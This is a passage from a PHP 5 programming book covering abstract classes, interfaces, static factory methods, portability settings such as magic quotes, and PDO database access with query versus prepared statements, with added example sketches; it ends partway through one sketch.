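}

class Circle extends Shape
{
  protected $name = 'circle';
}

$circle = new Circle();
echo $circle->describe(), "\n"; // I am a circle

// $shape = new Shape(); // would fail: Shape is abstract

$reflection = new ReflectionClass('Shape');
var_dump($reflection->isAbstract()); // bool(true)
```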

     There are more ways to use the abstract keyword than just at the class level.
     Typically, an abstract class also has one or more empty methods that don’t do
     anything other than demand that child classes implement them. For example,
     we could add a hypothetical method called addContent; we only include the
     method name and parameters:

                                                      AbstractHTMLElement.class.php (excerpt)

      <?php
      abstract class HTMLElement
      {
        ⋮ common properties and methods…
        abstract public function addContent(HTMLElement $element);
      }
      ?>



     Defining an abstract method in this way allows the author of the abstract class to
     indicate the intention of the class without dictating the implementation. In this
     example, the abstract addContent method must accept a single argument containing
     an HTMLElement object. The inclusion of this abstract method makes it compulsory
     for any concrete child class to implement the method. While the intention of this
     abstract method may be to force any HTMLElement object to add a child HTML element
     to its inner content, each HTML element achieves this in different ways. For example,
     some HTML elements can only contain child elements of a certain type; others can’t
     contain any child elements at all. If you’re curious to learn some more about
     abstraction, check out the manual page.22
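
To make the idea concrete, here's a rough sketch of how three child classes might each satisfy the addContent requirement in their own way. The HTMLList and HTMLListItem classes, the simplified HTMLImage, and the $children property are all hypothetical names invented for this illustration:

```php
<?php
abstract class HTMLElement
{
  protected $children = array();

  // Child classes must provide their own implementation
  abstract public function addContent(HTMLElement $element);
}

// Hypothetical list element: accepts only list items
class HTMLList extends HTMLElement
{
  public function addContent(HTMLElement $element)
  {
    if (!($element instanceof HTMLListItem)) {
      throw new InvalidArgumentException('A list can only contain list items');
    }
    $this->children[] = $element;
  }
}

// Hypothetical list item: accepts any element
class HTMLListItem extends HTMLElement
{
  public function addContent(HTMLElement $element)
  {
    $this->children[] = $element;
  }
}

// Simplified image element: can't contain children at all
class HTMLImage extends HTMLElement
{
  public function addContent(HTMLElement $element)
  {
    throw new LogicException('An img element cannot contain child elements');
  }
}
```

The abstract method fixes the signature, while each child decides what adding content actually means for its element.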

Object Interfaces
An object interface is the equivalent of an agreement to implement certain methods.
It differs from an abstract class in that it contains no implementation at all. Interfaces
are defined by the interface keyword; they’re written in the same way as classes,
except that the methods have no contents at all. Here’s an example of an interface:

                                                               HTMLSource.interface.php (excerpt)

 <?php
 interface HTMLSource
 {
   public function getSource();
 }
 ?>



This is a very simple interface but it’ll do for an example. Here, we’ve defined one
method: getSource. Any class that implements this interface must implement this
method; failure to do so will raise a fatal error. As the intention of interfaces is to
define a public interface, all methods must be declared public. Our intention with
the interface above is to indicate which objects can output an HTML source string.

To indicate that a class implements a specific interface, you use the implements
keyword. Here’s an example of this usage in a modification of our previously defined
WebsiteLogo class:

                                                                 WebsiteLogo2.class.php (excerpt)

 <?php
 require_once 'HTMLImage.class.php';
 require_once 'HTMLSource.interface.php';

 class WebsiteLogo implements HTMLSource
 {
   ⋮ class properties and methods…
   public function getSource()
   {
     return $this->img->getSource();
   }
 }
 ?>

22
     http://www.php.net/manual/en/language.oop5.abstract.php




     You may be wondering, “So what’s the big deal?” Well, let’s finish off our
     explanation of object interfaces by examining a situation where interfaces will come
     in handy. Let’s say for the purposes of this demonstration that the abstract
     HTMLElement class also implements the HTMLSource interface. The class already meets
     the interface’s requirements, since it has a public method called getSource, but
     PHP only treats it as an HTMLSource once we declare the fact in code, which also
     lets us test for it. We’d indicate the implementation like this:

                                                   AbstractHTMLElement2.class.php (excerpt)

      <?php
      require_once 'HTMLSource.interface.php';
      abstract class HTMLElement implements HTMLSource
      {
        ⋮ common properties and methods…
      }
      ?>



     To make use of this new feature of our codebase, let’s change the base class
     implementation of the getSource method:

                                                   AbstractHTMLElement2.class.php (excerpt)

        public function getSource()
        {
          if ($this->content instanceof HTMLSource)
          {
            $html = $this->content->getSource();
          }
          else
          {
            $html = $this->content;
          }
          return '<' . $this->tagname .
              $this->getAttributeSource() . '>' .
              $html .
              '</' . $this->tagname . '>';
        }




With this modified function, any object based on the HTMLElement class can now
have as its content any object that implements the HTMLSource interface. This could
be an object based on any one of our HTMLElement classes previously defined, or
even an object based on the WebsiteLogo class. When getSource is called, the
instanceof type operator is used to check the type of the content property: if it’s
an object that implements the interface, we call its getSource method; otherwise, we
assume it’s a string value and use that. The operator allows us to check that an object
implements the interface, allowing us to make use of it without having to know
exactly what kind of object it is.23
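
The same check can be tried out in isolation. In this sketch, the renderContent function and the Copyright class are hypothetical names made up for the example; only the HTMLSource interface comes from the discussion above:

```php
<?php
interface HTMLSource
{
  public function getSource();
}

// Hypothetical helper: returns HTML for an HTMLSource object or a plain string
function renderContent($content)
{
  if ($content instanceof HTMLSource) {
    return $content->getSource();
  }
  return (string) $content;
}

// Hypothetical class, unrelated to HTMLElement, that still honors the interface
class Copyright implements HTMLSource
{
  public function getSource()
  {
    return '<small>&copy; Example</small>';
  }
}

echo renderContent('plain text'), "\n";
echo renderContent(new Copyright()), "\n";
```

Because the test is made against the interface rather than a concrete class, renderContent works with any class that chooses to implement HTMLSource.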

Static Properties and Methods
Static properties and methods differ from object properties and methods in that
they can be accessed without the instantiation of an object. This feature is
particularly handy at times when you want to use a method of a class without
having to instantiate an object to do so.

Let’s take a closer look at how static methods work. Since having to type in new
HTMLParagraph(…) whenever we wish to create a paragraph is slightly tedious, we’ll
want to make it easier. Let’s make a class called HTML, which we can use without
having to instantiate any objects, to create our objects for us.24 We use the static
keyword to indicate that the methods are static:




23
     You can read more about interfaces here: http://www.php.net/manual/en/language.oop5.interfaces.php
and more about the instanceof operator here:
http://www.php.net/manual/en/language.operators.type.php
24
   This is an example of the Factory design pattern. Read more about patterns on the manual page at
http://www.php.net/manual/en/language.oop5.patterns.php.

                                                                               HTML.class.php

      <?php
      require_once 'HTMLParagraph.class.php';

      class HTML
      {
        public static function p($content, $attributes = array()) {
          return new HTMLParagraph($content, $attributes);
        }
      }
      ?>



     Here’s an example of how the HTML class could be used:

      echo HTML::p('This is a static method!');



     This example would output as follows:

      <p>This is a static method!</p>



     Notice that when we use a static method, we use the :: operator, rather than the
     object -> operator, to access the method. You may have noticed that this is the same
     operator used to call a method of the parent class of the current object, as in
     parent::method(). The parent class usage is a special case where inheritance is
     concerned, as the parent class method retains access to the object’s instance data,
     and therefore isn’t static.
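
A short sketch may help to separate the two uses of the :: operator. The Greeter and PoliteGreeter classes are hypothetical, invented purely for this illustration:

```php
<?php
class Greeter
{
  protected $name;

  public function __construct($name)
  {
    $this->name = $name;
  }

  public function greet()
  {
    return 'Hello, ' . $this->name;
  }

  // A static method: there's no object, so there's no $this
  public static function shout($text)
  {
    return strtoupper($text) . '!';
  }
}

class PoliteGreeter extends Greeter
{
  public function greet()
  {
    // parent:: uses the same operator, but $this is still available
    return parent::greet() . ', pleased to meet you';
  }
}

$g = new PoliteGreeter('Ada');
echo $g->greet(), "\n";          // Hello, Ada, pleased to meet you
echo Greeter::shout('hi'), "\n"; // HI!
```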


            $this Can’t be Used in Static Methods
           As static methods are used without the instantiation of an object, the $this
           variable can’t be used in static methods.


     Now to extend this example a bit (and possibly to excite your interest in OOP in
     PHP 5 into the bargain), imagine for a moment that we’ve added a static method
     and a corresponding class for each possible HTML element to our HTML class.
     Remembering that one HTMLElement object can be passed to the constructor of another
     HTMLElement object as its content, we can now create methods for all HTML elements
     that we can use as demonstrated in the following example:

      echo HTML::div(HTML::h1('Welcome to my web site!'),
          array('id' => 'header'));



This example would output the following HTML:

 <div id="header"><h1>Welcome to my web site!</h1></div>



Taking the above example as your goal, I’ll leave the implementation of such an
API up to you. Come on—with this introduction to OOP under your belt, it should
be easy!
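
If you'd like a starting point, here's one possible sketch. It's deliberately minimal and rests on an assumption: instead of the chapter's HTMLElement hierarchy, it uses a single hypothetical SimpleElement class that knows its own tag name and renders itself through __toString:

```php
<?php
// Hypothetical, simplified element class (the chapter's HTMLElement does more)
class SimpleElement
{
  private $tagname;
  private $content;
  private $attributes;

  public function __construct($tagname, $content, $attributes = array())
  {
    $this->tagname = $tagname;
    $this->content = $content;
    $this->attributes = $attributes;
  }

  public function __toString()
  {
    $attr = '';
    foreach ($this->attributes as $name => $value) {
      $attr .= ' ' . $name . '="' . htmlspecialchars($value) . '"';
    }
    // Concatenation converts a nested element to a string via its __toString
    return '<' . $this->tagname . $attr . '>' . $this->content .
        '</' . $this->tagname . '>';
  }
}

class HTML
{
  public static function div($content, $attributes = array())
  {
    return new SimpleElement('div', $content, $attributes);
  }

  public static function h1($content, $attributes = array())
  {
    return new SimpleElement('h1', $content, $attributes);
  }
}

echo HTML::div(HTML::h1('Welcome to my web site!'),
    array('id' => 'header'));
```

A fuller version would add one static method per element, or map each method to its own HTMLElement subclass.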


How do I write portable PHP code?
Not all PHP installations are the same. Depending on version and configuration
settings in your php.ini file, your script may or may not run correctly on another
server on which PHP is installed. To make life easier and minimize the need to
rewrite code for other servers, you should consider adopting a number of generally
accepted best practices.

Solution
The generally accepted best practices include keeping your configuration
central, writing your code to be reusable, always using the full PHP tags, always
using superglobal variables rather than relying on register_globals, and always
checking for magic quotes.

Keeping Configuration Central
For most PHP applications, it will be necessary to write configuration information
describing the environment in which the script will run, including database user-
names and passwords, directory locations, and so on. As a general rule, try to keep
the majority of this information in a single place—maybe even a single file—so that
when you need to modify the information, you can make all the necessary changes
in one place. That said, when you’re building modular applications, you may want
to store configuration that’s local to a specific module within the module
itself, rather than in a central location.

The way each of us chooses to store this information is a matter of personal choice.
In some cases, it may be worth considering the use of an XML file, or storing some
     of the information in a database. It’s also worth being aware of the parse_ini_file
     function.25
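
As a quick sketch of parse_ini_file in action, the following writes a small sample INI file to a temporary location and reads it back. The section and key names are made up for the example:

```php
<?php
// Write a small sample INI file so the sketch is self-contained
$file = tempnam(sys_get_temp_dir(), 'cfg');
file_put_contents($file, "[database]\nhost = localhost\nname = world\n");

// The second argument asks for a nested array keyed by section name
$config = parse_ini_file($file, true);
unlink($file);

echo $config['database']['host']; // localhost
```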

     A simple but effective storage mechanism is to place all the settings into a single
     file as PHP constants, which makes them available from any function or class in
     your application. Here’s an example:

      <?php
      // Configuration settings
      define('DOMAIN', 'sitepoint.com');

      // In another script
      echo 'The domain is ' . DOMAIN;
      ?>



     Constants need to be used with caution, though. In order for your functions and
     classes to be reusable in other applications, they shouldn’t depend on constants of
     a fixed name; rather, they should accept configuration information as arguments—an
     approach that will allow for greater code reuse. In such cases, it’s best to use PHP
     variables in your central configuration file, which you can then pass to functions
     and classes as required.

     For example, when we’re connecting to a database, we can identify a number of
     variables that we need to have stored in a central location: the server hostname, the
     username, and the password. We can place these variables in a file called, for
     instance, config.php, store that file outside the public web directories, and load
     it with require_once wherever it’s needed. This approach helps to ensure that users
     don’t accidentally browse to the file containing this critical information, a
     situation that would place the site’s security at risk.
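
Here's a small sketch of configuration held in variables and passed in as arguments. The array keys, the buildDsn helper, and the file path in the comment are all hypothetical; in a real project the array would sit in its own file rather than inline:

```php
<?php
// In a real project this array would live in config.php, outside the web root,
// and be loaded with something like:
//   require_once '/path/outside/webroot/config.php';
$config = array(
  'db_host' => 'localhost',
  'db_name' => 'world',
  'db_user' => 'user',
  'db_pass' => 'secret',
);

// Hypothetical helper: it receives its settings as arguments instead of
// reading constants of a fixed name, so it can be reused in other projects
function buildDsn($host, $dbname)
{
  return 'mysql:host=' . $host . ';dbname=' . $dbname;
}

$dsn = buildDsn($config['db_host'], $config['db_name']);
echo $dsn; // mysql:host=localhost;dbname=world
```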

     Recycling and Reuse
     It’s easy to say, but if you find yourself writing any more than one PHP script in
     your life, you need to start thinking about ways to make your code reusable before
     you suffer premature hair loss!

If you end up working on other sites or applications, you’ll appreciate having ready
code that you can simply plug into your new project. Also, if you’re writing code
that other people will integrate with existing applications on their web sites, you
need to package it in a form that doesn’t place requirements on the code they’re
already using. For example, if your application has some kind of user authentication
system, you’ll want to ask yourself if it can be integrated with the systems that site
owners are already using: systems with which large databases of users are likely
already associated.

25
     http://www.php.net/manual/en/function.parse-ini-file.php

The best approach is to write object oriented code with a mind to creating reusable
components, or pieces of functionality. Some people argue that creating PHP
applications using object oriented code results in slower-running applications and
should be avoided at all costs. What they forget to mention is that object oriented
programming delivers a drastic increase in your own performance as a developer. After
all, fast programmers cost more than fast microprocessors!

A number of important points must be considered when you’re measuring the
potential of your code for reuse:

■	 What happens when the project’s requirements change?
■	 How easy is it to add new features to your code?
■	 Are you still able to understand the code after a long period of time?
■	 Can your code be integrated easily with other applications?
■	 Will the assumptions you’ve made in your code apply to your work on other
   sites?

This book will provide many hints and suggestions to help you to write reusable
code, although an in-depth analysis of PHP applications design as a whole is beyond
its scope. As you read this book, you should be able to identify some of the critical
factors as subjects for further investigation. You have one main responsibility to
yourself as an experienced PHP developer: to keep expanding your knowledge of
the more esoteric aspects of software development, such as design patterns and
enterprise application architecture, as a means to improve your development
technique and, more importantly, save yourself time. The broader your knowledge, the
lower the risk of failure when you land the next big project.

Portability Essentials
Here are three steps you should take to ensure the portability of your PHP code.

     Using the Full <?php ?> Tags
     PHP supports a variety of tag styles to mark up sections of your code, including the
     short tags (<? ?>), and ASP-style tags (<% %>). Tag style support is controlled from
     php.ini with the settings short_open_tag and asp_tags. Be aware, though, that
     while you may have these settings switched on, other server administrators may
     not, which can be problematic. The short tag style, for example, causes issues when
     the PHP is mixed with XML documents that use processing instructions like this:

      <?xml version="1.0"?>



     If you have a document that contains PHP and XML, and you have the
     short_open_tag setting turned on, PHP will mistake the XML processing instruction
     <?xml for a PHP opening tag.

     It’s possible that your code will need to run in environments where short_open_tag
     and asp_tags are both turned off. The best way to make sure your code works
     regardless of these settings is to get into the habit of always using the <?php ?>
     tag style. Otherwise, you may have a lot of code rewriting to do in the future.
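
When a PHP script has to produce XML, one way to sidestep the clash altogether is to emit the declaration as an ordinary string. This is only a sketch; the xmlDeclaration helper is a hypothetical name:

```php
<?php
// Return the declaration as a string so that it's never parsed as a PHP tag,
// whatever the short_open_tag setting happens to be
function xmlDeclaration($version = '1.0')
{
  return '<?xml version="' . $version . '"?>' . "\n";
}

echo xmlDeclaration();
echo '<greeting>Hello</greeting>', "\n";
```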

     Turning register_globals Off
     Make sure the following code is in place in your php.ini file:

      register_globals = off



     This will force you to access incoming data via the special predefined superglobal
     variables (e.g. $_GET['username']), ensuring there won’t be a conflict with variables
     you’ve created in your script.
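
As a brief sketch, here's how a script might read an incoming value through a superglobal. The requestValue helper and the guest default are assumptions made for the example:

```php
<?php
// Hypothetical helper: read a value from a request array, with a fallback
function requestValue(array $source, $key, $default = null)
{
  return isset($source[$key]) ? $source[$key] : $default;
}

// With register_globals off, a username sent in the query string never
// creates a $username variable by itself; we fetch it from $_GET explicitly
$username = requestValue($_GET, 'username', 'guest');
echo 'Hello, ' . htmlspecialchars($username);
```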

     The same result can be achieved by placing the following code in your Apache
     .htaccess file:


      php_flag register_globals off



     Further information can be found in The PHP Manual,26 and in Kevin Yank’s article,
     Write Secure Scripts with PHP 4.2! on SitePoint.27


     26
          http://www.php.net/manual/en/security.globals.php
     27
          http://www.sitepoint.com/article/write-secure-scripts-php-4-2/

Checking for Magic Quotes
Magic quotes is a feature of PHP that’s intended to help prevent security breaches
in sites developed by PHP beginners.

The magic quotes feature adds escape characters (backslashes that indicate that
quotation marks should be included in the string, rather than marking the end of
the string) to incoming URL query strings, form posts, and cookie data automatically,
before your script is able to access any of these values. Should you insert the data
directly into your database, magic quotes makes it much harder for a malicious user
to tamper with the database, provided the functionality is switched on.
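
To see what this escaping looks like, we can apply it by hand. The addslashes function performs the same style of escaping that magic quotes applies automatically; the sample value is made up:

```php
<?php
// addslashes() applies the same style of escaping that magic quotes
// applies automatically to incoming data
$submitted = "O'Reilly";
$escaped = addslashes($submitted);
echo $escaped, "\n";               // O\'Reilly

// stripslashes() reverses it, recovering the original text
echo stripslashes($escaped), "\n"; // O'Reilly
```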

For beginners, this is certainly a useful way to prevent disasters. However, once
you understand what SQL injection attacks are, and have developed the habit of
writing code to avoid them,28 the magic quotes functionality can become more of
a problem than it’s worth.

Magic quotes functionality is controlled by the PHP configuration setting
magic_quotes_gpc, which can be set to either on or off.

My own preference is always to have magic quotes switched off, and to deal with
the task of escaping data for SQL statements myself. Unfortunately, this means that
the code I write won’t port well to PHP installations where magic quotes is switched
on—I’ll end up with backslashes in my content. Thankfully, to deal with this
problem, PHP provides the function get_magic_quotes_gpc, which can be used
to find out whether the magic quotes functionality is switched on. To keep the code
in this book portable, we’ll use a simple file that strips out magic quotes, should
this functionality be enabled:




28
   See “How do I protect my web site from an SQL injection attack?” in Chapter 2 for more on SQL
injection attacks.


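      <?php
      /**
       * Checks for magic_quotes_gpc = On and strips the slashes from
       * incoming requests if necessary
       */
      // Recurse so that array-valued fields (e.g. name="choice[]") are handled too
      function stripSlashesDeep($value)
      {
        return is_array($value)
            ? array_map('stripSlashesDeep', $value)
            : stripslashes($value);
      }
      // get_magic_quotes_gpc no longer exists in PHP 8, hence the guard
      if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $_GET    = stripSlashesDeep($_GET);
        $_POST   = stripSlashesDeep($_POST);
        $_COOKIE = stripSlashesDeep($_COOKIE);
      }
      ?>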



     If we include this code at the start of any file in which we accept data from a query
     string, a form post, or a cookie, we’ll remove any slashes added by magic quotes,
     should this functionality be switched on.


     Summary
     Are you ready to jump in and try the PHP 5 waters? This chapter has shown you
     how to keep your head up and tread water. You may not be a professional swimmer
     yet, but with The PHP Manual by your side—as well as this book—we’ll keep you
     afloat, introduce you to some of the beauty of the PHP ocean, and eventually show
     you how to glide through the waters with grace!
Chapter 2

Using Databases with PDO
In the “old days” of the Internet, most web pages were nothing more than text files
containing HTML. When people visited your site, your web server simply made the
file available to their browsers. This approach started out fine, but as web sites grew,
and issues such as design and navigation became more important, developers found
that maintaining consistency across hundreds of HTML files was becoming a massive
headache. To solve this problem, it became popular to separate variable content
(articles, news items, and so on) from the static elements of the site—its design and
layout.

If a database is used as a repository to store variable content, a server-side language
such as PHP performs the task of fetching that data and placing it within a uniform
layout template. This means that modifying the look and feel of a site can be handled
as a separate task from the maintenance of content. And maintaining consistency
across all the pages in a web site no longer consumes a developer’s every waking
hour.

PHP supports all the relational databases worth mentioning, including those that
are commonly used in large companies: Oracle, IBM’s DB2, and Microsoft’s SQL
Server, to name a few. The three most noteworthy open source alternatives are
     SQLite, PostgreSQL, and MySQL. PostgreSQL is arguably the best database of the
     three, in that it supports more of the features that are common to relational databases.
     SQLite is the perfect choice for smaller applications that still require database
     capability. MySQL is a popular choice among web hosts that provide support for PHP,
     and for this reason is typically easier to find than PostgreSQL.

     This chapter covers all the common operations that PHP developers perform when
     working with databases: retrieving and modifying data, and searching and backing
     up the database. To achieve these tasks, we’ll use the built-in PDO extension, rather
     than database-specific extensions. The examples we’ll work with will use a single
     table, so table relationships aren’t discussed here. For a full discussion of
     that topic, see Kevin Yank’s Build Your Own Database Driven Website Using PHP
     & MySQL, 3rd Edition (SitePoint, Melbourne, 2006)1.

     The examples included here work with the MySQL sample database called “world,”
     though all the interactions we’ll work through can be undertaken with any database
     supported by PDO. The SQL file for the world database is available at
     http://dev.mysql.com/doc/#sampledb and the instructions explaining its use can
     be found at http://dev.mysql.com/doc/world-setup/en/world-setup.html.


     What is PDO?
     PDO, the PHP Data Objects extension, is a data-access abstraction layer. But what
     the heck is that? Basically, it’s a consistent interface for multiple databases. No
     longer will you have to use the mysql_* functions, the sqlite_* functions, or the
     pg_* functions, or write wrappers for them to work with your database. Instead,
     you can simply use the PDO interface to work with all three databases using the
     same methods. And, if you change databases, you’ll only have to change the DSN
     (or Data Source Name) of the PDO to make your code work.2
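
The following sketch illustrates the point. It assumes the pdo_sqlite driver is enabled so that an in-memory SQLite database can stand in for a real server; the countCities helper and the cut-down city table are hypothetical:

```php
<?php
// Hypothetical helper: nothing in here depends on which database is behind $dbh
function countCities(PDO $dbh)
{
  return (int) $dbh->query('SELECT COUNT(*) FROM city')->fetchColumn();
}

// An in-memory SQLite database keeps the sketch self-contained. Swapping in a
// MySQL or PostgreSQL DSN (plus credentials) would leave countCities() untouched
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (Name VARCHAR(35), CountryCode CHAR(3))');
$dbh->exec("INSERT INTO city VALUES ('Boston', 'USA')");

echo countCities($dbh);
```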

     PDO uses specific database drivers to interact with various databases, so you can’t
     use PDO by itself. You’ll need to enable the drivers you’ll use with PDO, so be sure
     to research how to do it for your specific host operating system on the PDO manual
     page.3

     1
       http://www.sitepoint.com/books/phpmysql1/
     2
       That’s all you’ll have to do so long as you write your SQL in a way that’s not database specific. If you
     try to stick to the ANSI 92 standard [http://www.contrib.andrew.cmu.edu/~shadow/sql/sql1992.txt],
     you should generally be okay, since most databases support that syntax.

PDO is shipped with PHP 5.1 and is available from PECL for PHP 5.0. Unfortunately,
as PDO requires the new PHP 5 object oriented features, it’s not available for PHP
4. In this book, all of our interactions with the database will use PDO to interact
with the MySQL back end.


How do I access a database?
Before we can do anything with a database, we need to talk to it. And to talk to it,
we must make a database connection. Logical, isn’t it?

Solution
Here’s how we connect to a MySQL database on the localhost:

                                                          mysqlConnect.php (excerpt)

    <?php
    $dsn = 'mysql:host=localhost;dbname=world;';
    $user = 'user';
    $password = 'secret';
    try
    {
      $dbh = new PDO($dsn, $user, $password);
    }
    catch (PDOException $e)
    {
      echo 'Connection failed: ' . $e->getMessage();
    }
    ?>



We’d use this code to connect to a SQLite database on the localhost:




3
    http://www.php.net/pdo/

                                                                           sqliteConnect.php (excerpt)

         <?php
         $dsn = 'sqlite2:"C:\sqlite\world.db"';
         try
         {
           $dbh = new PDO($dsn);
         }
         catch (PDOException $e)
         {
           echo 'Connection failed: ' . $e->getMessage();
         }
         ?>



     And this code will let us connect to a PostgreSQL database on the localhost:

                                                                         postgreConnect.php (excerpt)

         <?php
         $dsn = 'pgsql:host=localhost port=5432 dbname=world user=user ';
         $dsn .= 'password=secret';
         try
         {
           $dbh = new PDO($dsn);
         }
         catch (PDOException $e)
         {
           echo 'Connection failed: ' . $e->getMessage();
         }
         ?>



     Discussion
     Notice that in all three examples above, we simply create a new PDO object. Only
     the connection data for the PDO constructor differs in each case: for the SQLite and
     PostgreSQL connections, we need just the DSN; the MySQL connection also requires
     username and password arguments in order to connect to the database.4



     4
       We could have put the username and password information in the MySQL DSN, providing a full DSN,
     but the average user has no cause to do this when using MySQL. It just adds unnecessary complexity to
     the DSN.

The DSN in Detail
As we saw above, DSN is an acronym for Data Source Name. The DSN provides the
information we need in order to connect to a database. The DSN for PDO has three
basic parts: the PDO driver name (such as mysql, sqlite, or pgsql), a colon, and
the driver-specific syntax. The only aspect that may be a bit confusing here is the
driver-specific syntax, as each driver requires different information. But have no
fear—the trusty manual is here, of course!
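
The three-part structure is easy to see if we pull a DSN apart ourselves. The splitDsn function is a hypothetical helper written for this illustration; PDO does this parsing internally:

```php
<?php
// Split a DSN at the first colon: driver name on the left,
// driver-specific syntax on the right
function splitDsn($dsn)
{
  list($driver, $details) = explode(':', $dsn, 2);
  return array('driver' => $driver, 'details' => $details);
}

$parts = splitDsn('mysql:host=localhost;dbname=world');
echo $parts['driver'], "\n";  // mysql
echo $parts['details'], "\n"; // host=localhost;dbname=world
```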

The manual describes the database driver-specific syntax that’s required in the DSN
for each of the PDO drivers. All you need to do is to go to the database driver page,5
select your database driver, and follow the link to the DSN information. For example,
the MySQL DSN page in the manual is found at
http://www.php.net/manual/en/ref.pdo-mysql.connection.php; it’s shown in
Figure 2.1.




                               Figure 2.1. The PDO_MySQL DSN manual page




5
    http://www.php.net/manual/en/ref.pdo.php#pdo.drivers

     DSN examples are also provided on each manual page to get you started.


            Do Not Pass Credentials in the DSN
           In the database connection examples we just saw, I included my access credentials
           within the DSN, or in the $user and $password variables, but I did so for
           illustration purposes only. Hard-coding credentials like this is neither standard
           nor appropriate practice, since the information can be misused by malicious
           parties to access your database.


     Other Concepts
     There are several concepts that you should understand when working with a
     database. First, you need to remember that the database server is a completely separate
     entity from PHP. While in these examples the database server and the web server
     are the same machine, this is not always the case. So, if your database is on a different
     machine from your PHP, you’ll need to change the host name in the DSN to point
     to it.

     To make things more interesting, database servers only listen for your connection
     on a specific port number. Each database server has a default port number (MySQL’s
     is 3306, PostgreSQL’s is 5432), but that may not be the port that the database
     administrator chose to set, or the one that PHP knows to look at. When in doubt, include
     your port number in the DSN.

     You also need to be aware that a database server can have more than one database
     on it, so yours may not be the only one. This is why the database name is commonly
     included in the DSN—to help you get to your data, not some other person’s!

     Finally, make sure you understand what you’ll receive from your PDO connection.
     Your connection will return a PDO object—not a reference to the database, or any
     data. It is through the PDO object that we interact with the database, bending it to
     our will.


     How do I fetch data from a table?
     Here we are, connected to the database. Woo hoo! But what good is that if we can’t
     get anything out of the database?


Solutions
PDO provides a couple of ways for us to interact with the database. Here, we’ll
explore both possible solutions.

Using the Query Method
First, let’s look at the faster, but not necessarily better, way—using the query
method:

                                                               pdoQuery.php (excerpt)

 $country = 'USA';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'Select * from city where CountryCode =' .
       $dbh->quote($country);
   foreach ($dbh->query($sql) as $row)
   {
     print $row['Name'] . "\t";
     print $row['CountryCode'] . "\t";
     print $row['Population'] . "\n";
   }
 }
 catch (PDOException $e)
 {
   echo 'PDO Exception Caught. ';
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo 'Error: ' . $e->getMessage();
 }



An excerpt of this code’s output can be seen in Figure 2.2.




                         Figure 2.2. Output produced using the PDO query method


     Using the Prepare and Execute Methods
     Using the prepare and execute methods is generally considered the better way to
     handle a query to the database. First, we call PDO->prepare with our SQL statement
     as an argument. In return, we receive a PDOStatement object, on which we call the
     execute method. Then, within a while loop, we repeatedly call the
     PDOStatement->fetch method to retrieve the data we’ve selected from our database:

                                                                            pdoPrepEx.php (excerpt)

      $country = 'USA';
      try
      {
        $dbh = new PDO($dsn, $user, $password);
        $sql = 'Select * from city where CountryCode =:country';
        $dbh->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
        $stmt = $dbh->prepare($sql);
        $stmt->bindParam(':country', $country, PDO::PARAM_STR);
        $stmt->execute();
        while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
          print $row['Name'] . "\t";
          print $row['CountryCode'] . "\t";
          print $row['Population'] . "\n";
        }
      }
      catch (PDOException $e)
      {
        echo 'PDO Exception Caught. ';
        echo 'Error with the database: <br />';
        echo 'SQL Query: ', $sql;
        echo 'Error: ' . $e->getMessage();
      }




An excerpt of the output of this code can be seen in Figure 2.3.




                  Figure 2.3. Output using the PDO prepare and execute methods


     Discussion
     You’ll have noticed that both these solutions give you the same data, which is as it
     should be. But there are very specific reasons for choosing one solution over the
     other.

     PDO->query is great when you’re only executing a query once. While it doesn’t
     automatically escape any data you send it, it does have the very handy ability to
     iterate over the result set of a successful SELECT statement. However, you should
     take care when using this method. If you don’t fetch all the data in the result set,
     your next call to PDO->query might fail.6 If you’re going to use the SQL statement
     more than once, your best bet is to use prepare and execute—the preferred solution.
     Using prepare and execute has a couple of advantages over query. First, it will
     help to prevent SQL injection attacks by automatically escaping any argument you
     give it (this approach is often considered the better practice for this reason alone).
     Granted, if you build any other part of your query from user input, that will negate
     this advantage, but you wouldn’t ever do that, would you? Second, prepared
     statements that are used multiple times (for example, to perform multiple inserts or
     updates to a database) use fewer resources and will run faster than repeated calls
     to the query method.
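
Here's a rough sketch of a statement being prepared once and executed several times. It assumes the pdo_sqlite driver is available and uses an in-memory database with a cut-down, hypothetical version of the city table:

```php
<?php
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (Name VARCHAR(35), CountryCode CHAR(3))');

// Prepare once...
$stmt = $dbh->prepare(
    'INSERT INTO city (Name, CountryCode) VALUES (:name, :country)');
$stmt->bindParam(':name', $name, PDO::PARAM_STR);
$stmt->bindParam(':country', $country, PDO::PARAM_STR);

// ...then execute repeatedly. bindParam binds by reference, so each
// execute() picks up the current values of $name and $country
$cities = array(
  array('Boston', 'USA'),
  array("Coeur d'Alene", 'USA'),
  array('Lyon', 'FRA'),
);
foreach ($cities as $city) {
  $name = $city[0];
  $country = $city[1];
  $stmt->execute();
}

echo $dbh->query('SELECT COUNT(*) FROM city')->fetchColumn(); // 3
```

Note that the apostrophe in the second city name needs no manual escaping, because the value travels as a bound parameter rather than as part of the SQL string.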

     There are a couple of other ways we can use prepare and execute on a query, but
     I feel that the example we discussed here will be the clearest. I used named parameters
     in this solution, but be aware that PDO also supports question mark (?)
     parameter markers. In the example we saw here, you could have chosen not to use
     the bindParam method; instead, you could have passed the parameters to the execute
     method as an array. See The PHP Manual if you have any questions about the alternative
     syntaxes.
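
     As a rough sketch of those alternative syntaxes, the code below passes values
     straight to execute, first with named parameters and then with question mark
     markers. The in-memory SQLite database and the two sample rows are assumptions
     made so that the sketch is self-contained.

```php
<?php
// Assumption: an in-memory SQLite table stands in for the world database
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (ID INTEGER PRIMARY KEY, Name TEXT,
    CountryCode TEXT)');
$dbh->exec("INSERT INTO city (Name, CountryCode)
    VALUES ('Guam', 'GU'), ('Dededo', 'GU')");

// Named parameters, with the values given to execute as an array
$stmt = $dbh->prepare('SELECT Name FROM city
    WHERE CountryCode = :country ORDER BY Name');
$stmt->execute(array(':country' => 'GU'));
$named = $stmt->fetchAll(PDO::FETCH_COLUMN);

// Question mark markers, with the values matched by position
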